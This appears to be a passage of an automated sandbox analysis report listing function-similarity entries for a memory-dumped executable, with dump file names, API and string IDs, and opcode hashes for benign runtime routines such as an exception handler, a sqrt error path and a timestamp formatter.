                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: KeyboardLayout$CharUpper_invalid_parameter_noinfo
                                                                                                                                                                              • String ID: Up$MZ@
                                                                                                                                                                              • API String ID: 991500651-2530889181
                                                                                                                                                                              • Opcode ID: 99a0123ef81d10f7d3571865edfa6498b9d18e75d826b17362c732bf2e8331d9
                                                                                                                                                                              • Instruction ID: 16102bfd6169c08d9ffd9c3fa60d5987e1da30e58a13d1bfefa732123d9facd7
                                                                                                                                                                              • Opcode Fuzzy Hash: 99a0123ef81d10f7d3571865edfa6498b9d18e75d826b17362c732bf2e8331d9
                                                                                                                                                                              • Instruction Fuzzy Hash: 441193726086918AF7269B26A4147FE3BB0F70E7D8F088011FB8547BE5DB3AC185C750
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CastDynamic
                                                                                                                                                                              • String ID: <= ComObject(0x%04hX, 0x%I64X)$%s[Object]: 0x%p
                                                                                                                                                                              • API String ID: 3796249952-2079539286
                                                                                                                                                                              • Opcode ID: 0cfe193ec14cb54d141adfe725b2b17fdddff6790fedc225af90be57ad319325
                                                                                                                                                                              • Instruction ID: 12dca68bd3c9b0efa865de88b412115126adeeefee3b0860853389af5e703528
                                                                                                                                                                              • Opcode Fuzzy Hash: 0cfe193ec14cb54d141adfe725b2b17fdddff6790fedc225af90be57ad319325
                                                                                                                                                                              • Instruction Fuzzy Hash: B4118872204B8582EA15CB22E8103DAA7A5F78CBC8F844516FF8C53B78CF38C212C780
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _handle_error
                                                                                                                                                                              • String ID: !$sqrt
                                                                                                                                                                              • API String ID: 1757819995-799759792
                                                                                                                                                                              • Opcode ID: 36be33b9a843fa4c7b5f72a71a06964e9706ddada4aeb20657430f2c35bb3c9e
                                                                                                                                                                              • Instruction ID: 5da013a3b2cc208e5229d90518f7c4cfa1009cccdb14816a382bde0aac28e957
                                                                                                                                                                              • Opcode Fuzzy Hash: 36be33b9a843fa4c7b5f72a71a06964e9706ddada4aeb20657430f2c35bb3c9e
                                                                                                                                                                              • Instruction Fuzzy Hash: 6411CA72918BC483DE46CF56950035A6661FBDE7E4F104311BB680B7E8DB7CD141DB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: SystemTime
                                                                                                                                                                              • String ID: %04d%02d%02d%02d%02d%02d
                                                                                                                                                                              • API String ID: 2656138-4847443
                                                                                                                                                                              • Opcode ID: 7dc5cb1ef4f8624ac15fefc7ddcfaf03fd45f9086a35d9e35febe698eb4817f1
                                                                                                                                                                              • Instruction ID: 390f09cb60d62b6b73f3b4ea4f67228e8d1ee9afbcdbe6a5b34daf4d1f640ee4
                                                                                                                                                                              • Opcode Fuzzy Hash: 7dc5cb1ef4f8624ac15fefc7ddcfaf03fd45f9086a35d9e35febe698eb4817f1
                                                                                                                                                                              • Instruction Fuzzy Hash: A6017172518650D6D7959F16E0003BAB6B1F789B61F144311FBAA43AE4E73DC1A0DB14
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                              • String ID: Unknown exception
                                                                                                                                                                              • API String ID: 3561508498-410509341
                                                                                                                                                                              • Opcode ID: 91f43999391f72d0a083d5c63666b37ee58cc89e23bb8b59a5df88601c3f76d5
                                                                                                                                                                              • Instruction ID: e4e6731caf7acc5884f1e6bee6622a14749b05094d5db8db978ed02bc6170a89
                                                                                                                                                                              • Opcode Fuzzy Hash: 91f43999391f72d0a083d5c63666b37ee58cc89e23bb8b59a5df88601c3f76d5
                                                                                                                                                                              • Instruction Fuzzy Hash: 29D09E33614A84A5DE21EB05D8953C96330F3A8388FA05515B34C435B5DF79CA8AD740
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%